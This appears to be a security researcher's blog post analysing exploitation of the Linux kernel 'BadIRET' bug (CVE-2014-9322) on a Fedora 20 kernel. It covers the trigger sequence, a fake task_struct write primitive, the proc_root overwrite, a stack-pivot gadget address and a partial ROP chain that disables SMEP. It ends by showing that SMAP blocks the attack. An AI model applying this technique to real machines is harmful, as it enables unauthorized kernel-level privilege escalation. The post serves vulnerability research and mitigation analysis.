Skip to content
February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)


is described as follows:

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.

I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.

All experiments were conducted on Fedora 20 system, running 64bit 3.11.10-301 kernel; all the discussion is 64bit-specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode
    arbitrary code execution.
  • SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

    Digression: kernel, usermode, iret

    The vulnerability

    In a few cases, when Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to bad_iret function, that does

         /* So pretend we completed the iret and took the #GPF in user mode.*/
         pushq $0
         jmp general_protection

    As the comment explains, the subsequent code flow should be identical to the case when
    general protection exception happens in user mode (just jump to the #GP handler). This works well in case of most of the exceptions that can be raised by iret, e.g. #GP.

    The problematic case is #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – “push” instruction generates a page fault that gets converted into double fault. I have not analysed this scenario; from now on, we focus on pre 3.16 kernel, with no “espfix”.

    The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph, otherwise skip it.

    Digression: swapgs instruction

    When memory is accessed with gs segment prefix, like this:

    mov %gs:LOGICAL_ADDRESS, %eax

    the following actually happens:

    1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
    2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

    The base address is initially derived from Global Descriptor Table (or LDT). However, there are situations where GS segment base is changed on the fly, without involving GDT.

    Quoting SDM:

    “SWAPGS exchanges the current GS base register value with the value contained
    in MSR address C0000102H
    (IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction
    intended for use by system software. (…) The kernel can then use the GS prefix on
    normal memory references to access [per-cpu]kernel data structures.”

    For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is:

    1. swapgs (now the gs base points to kernel memory)
    2. access per-cpu kernel data structures via memory instructions with gs prefix
    3. swapgs (it undos the result of the previous swapgs, gs base points to usermode memory)
    4. return to usermode

    Naturally, kernel code must ensure that whenever it wants to access percpu data with gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is noneven (so that gs base points to kernel memory).

    Triggering the vulnerability

    By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, kernel will try to access important data structures with a wrong gs base, controllable by the user.

    When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says:

     64-Bit Mode Exceptions:
     If an attempt to pop a value off the stack violates the SS limit.
     If an attempt to pop a value off the stack causes a non-canonical address
     to be referenced.

    None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

    IF stack segment is not present
    THEN #SS(SS selector); FI;

    So, in usermode, we need to set ss register to something not present. It is not straighforward: we cannot just use

    mov $nonpresent_segment_selector, %eax
    mov %ax, %ss

    as the latter instruction will generate #GP. Setting the ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64bits system (it might work on 32bit, though). The solution is:

    1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
    2. thread B: ss:=X_selector
    3. thread A: invalidate X via sys_modify_ldt
    4. thread B: wait for hardware interrupt

    The reason why one needs two threads (both in the same process) is that the return from the syscall (including sys_modify_ldt) is done via sysret instruction that hardcodes the ss value. If we invalidated X in the same thread that did “ss:=X instruction”, ss would be undone.

    Running the above code results in kernel panic. In order to do something more meaningful, we will need to control usermode gs base; it can be set via arch_prctl(ARCH_SET_GS) syscall.

    Achieving write primitive

    If we run the above code, then #SS handler runs fine (meaning: it will not touch memory at gs base), returns into bad_iret, that in turn jumps to #GP exception handler. This runs fine for a while, and then calls the following function:

    289 dotraplinkage void
    290 do_general_protection(struct pt_regs *regs, long error_code)
    291 {
    292         struct task_struct *tsk;
    306         tsk = current;
    307         if (!user_mode(regs)) {
                    ... it is not reached
    317         }
    319         tsk->thread.error_code = error_code;
    320         tsk->thread.trap_nr = X86_TRAP_GP;
    322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
    323                         printk_ratelimit()) {
    324                 pr_info("%s[%d] general protection ip:%lx sp:%lx
    325                         tsk->comm, task_pid_nr(tsk),
    326                         regs->ip, regs->sp, error_code);
    327                 print_vma_addr(" in ", regs->ip);
    328                 pr_cont("\n");
    329         }
    331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
    332 exit:
    333         exception_exit(prev_state);
    334 }

    It is far from obvious from the C code, but the assignment to tsk from current macro uses memory read with gs prefix. Line 306 is actually:

    0xffffffff8164b79d :	mov    %gs:0xc780,%rbx

    This gets interesting. We control the “current” pointer, that points to the giant data structure describing the whole Linux process. Particularly, the lines

    319         tsk->thread.error_code = error_code;
    320         tsk->thread.trap_nr = X86_TRAP_GP;

    are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are 0 and 0xd constants, respectively), but this should not be a problem. Game over ?

    Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

    1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
    2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code)
    3. trigger the vulnerability

    Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. unhandled_signal() function dereferences a pointer from task_struct. We have no control what lies beyond X, and the result will be a page fault in kernel.

    How can we cope with this? Options:

    1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.


  • Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.This does not work, either, for two reasons:
    • Linux makes IDT read-only (bravo!)
    • even if IDT was writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDS of IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being an useful stack pivot sequence are negligible.


  • We can try a race. Say, “tsk->thread.error_code = error_code” write facilitates code
    execution, e.g. allows to control code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.I tried this approach a couple of times, with no luck; perhaps with different vulnerability the timings would be different and it would work better.
  • Throw a towel on “tsk->thread.error_code = error_code” write.With some disgust, we will follow the last option. We will point “current” to usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

    Achieving write primitive continued, aka life after do_general_protection

    Our next chance is the function called by do_general_protection():

    force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
            unsigned long int flags;
            int ret, blocked, ignored;
            struct k_sigaction *action;
            spin_lock_irqsave(&t->sighand->siglock, flags);
            action = &t->sighand->action[sig-1];
            ignored = action->sa.sa_handler == SIG_IGN;
            blocked = sigismember(&t->blocked, sig);   
            if (blocked || ignored) {
                    action->sa.sa_handler = SIG_DFL;
                    if (blocked) {
                            sigdelset(&t->blocked, sig);
            if (action->sa.sa_handler == SIG_DFL)
                    t->signal->flags &= ~SIGNAL_UNKILLABLE;
            ret = specific_send_sig_info(sig, info, t);
            spin_unlock_irqrestore(&t->sighand->siglock, flags);
            return ret;

    The field “sighand” in task_struct is a pointer, that we can set to an arbitrary value. It means that the

    action = &t->sighand->action[sig-1];
    action->sa.sa_handler = SIG_DFL;

    lines are another chance for write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0.

    This finally works, hurray ! with a little twist. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is a line

    spin_lock_irqsave(&t->sighand->siglock, flags);

    As t->sighand->siglock is at constant offset from t->sighand->action[sig-1].sa.sa_handler, it means kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then?

    There are two possibilities:

    1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
    2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following:
    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.

    A careful reader is encouraged to enquire why cannot use the latter approach in the case X+SPINLOCK is initially unlocked.

    This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because still the usermode ss value on the stack refers to a nonpresent segment). But this time, the extra swapgs instruction in #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.

    Digression: SMEP

    SMEP is a feature of Intel processors, starting from 3rd generation of Core processor. If the SMEP bit is set in CR4, CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

    Achieving code execution

    The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?

    Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to an useful stack pivot sequence are low.

    What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite top bytes of P so that the resulting address is in usermode, and P->code_pointer_in_x() call will jump to a location that we can choose.

    I am not sure what is the best object to attack. For my experiments, I choose the kernel proc_root variable. It is a structure of type

    struct proc_dir_entry {
            const struct inode_operations *proc_iops;
            const struct file_operations *proc_fops;
            struct proc_dir_entry *next, *parent, *subdir;
            u8 namelen;
            char name[];

    This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

    struct inode_operations {
            struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
            void * (*follow_link) (struct dentry *, struct nameidata *);
            ...many more...
            int (*update_time)(struct inode *, struct timespec *, int);
    } ____cacheline_aligned;

    proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT.

    So, we will ovewrite proc_root.subdir so that it becomes a pointer to a controlled struct
    proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

    1. map 16MB of memory at address 4096
    2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to usermode address FAKE_IOPS, and name field being “A” string.
    3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir

    Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info() proc_root.subdir will point to controlled usermode memory. When our process will call open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?

    If you think the answer is “to our shellcode”, go back and read again.

    We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes the knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in case of the tested kernel), works very well for 64bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32bit registers, thus clearing the high 32bits of %rsp, and landing %rsp in usermode memory. At the worst case, we may need to allocate low 4GB of virtual memory and fill it with rop chain.

    In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

    1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
    2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

    In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers.

    In the second case, the %rsp will be assigned the low 32bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well.

    To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses.

    The ROP chain itself is straightforward, shown for the second case:

    unsigned long *stack=0x8119f1ed;
    *stack++=0xffffffff81307bcdULL;  // pop rdi, ret
    *stack++=0x407e0;                //cr4 with smep bit cleared
    *stack++=0xffffffff8104c394ULL;  // mov rdi, cr4; pop %rbp; ret
    *stack++=0xaabbccdd;             // placeholder for rbp


    Digression: SMAP

    SMAP is a feature of Intel processors, starting from 5th generation of Core processor. If the SMAP bit is set in CR4, CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on an a system with Core-M 5Y10a CPU) that tries to access usermode crashes with:

    [  314.099024] running with cr4=0x3407e0
    [  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
    [  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
    [  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
    [  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

    As we can see, although the usermode page is present, access to it throws a page fault.

    Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (that was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in case of Linux, access to usermode is performed explicitely, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in the exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP.

    SMAP to the rescue!

    The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode.

    What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

    write(pipe_filedescriptor, evil_data, ...

    then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.

    However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel:

    long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
             int ret = 0; 
             int doit = task == current;
             int cpu;
             switch (code) { 
             case ARCH_SET_GS:
                     if (addr >= TASK_SIZE_OF(task))
                             return -EPERM; 
                     ... honour the request otherwise

    Houston, we have a problem – we cannot use this API to set gs base above the end of usermode memory !

    Recent CPUs feature wrgsbase instruction, that sets the gs base directly. This is a nonprivileged instruction, but needs to be enabled by the kernel by setting the FSGSBASE bit (no 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

    On 64bits, nonsystem entries in GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with base address in kernel space.

    So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.

%d bloggers like this: